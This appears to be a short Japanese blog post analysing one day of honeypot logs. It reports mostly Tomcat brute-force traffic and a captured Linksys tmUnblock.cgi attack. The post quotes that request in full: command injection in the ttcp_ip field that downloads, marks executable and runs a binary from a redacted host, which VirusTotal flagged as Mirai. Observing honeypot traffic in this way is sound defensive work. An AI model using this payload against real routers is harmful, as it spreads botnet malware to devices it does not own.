ハニーポットログ観察1
4/24日分を分析していきたいと思います。
総アクセス数4542
アクセス先
GET http://[ip]/echo.php // []内は伏せておきます GET http://[ip]/testget?q=23333&port=80 GET /manager/html GET http://www.neti.ee/?[] GET http://m.baidu.com/?[] POST /tmUnblock.cgi
8080番ポートへのスキャン
感想
今回も、ログの殆どがTomcatに対する攻撃でした。 内容はしっかりと分析していませんが、殆どが総当りでしょう。
気になった攻撃はtmUnblock.cgiの部分ですね、調べてみると Linksys(ルーター)の脆弱性を突いた攻撃っぽいです
ttcp_ip=-h+`cd+/tmp;+rm+-rf+mpsl;+wget+http://[IP]/vb/mpsl;+chmod+777+mpsl;+./mpsl+linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
virus totalに突っ込んでみるとmiraiと帰ってきました。 派生系などが中々流行ってるみたいですね。
詳しくは後々追記していきます。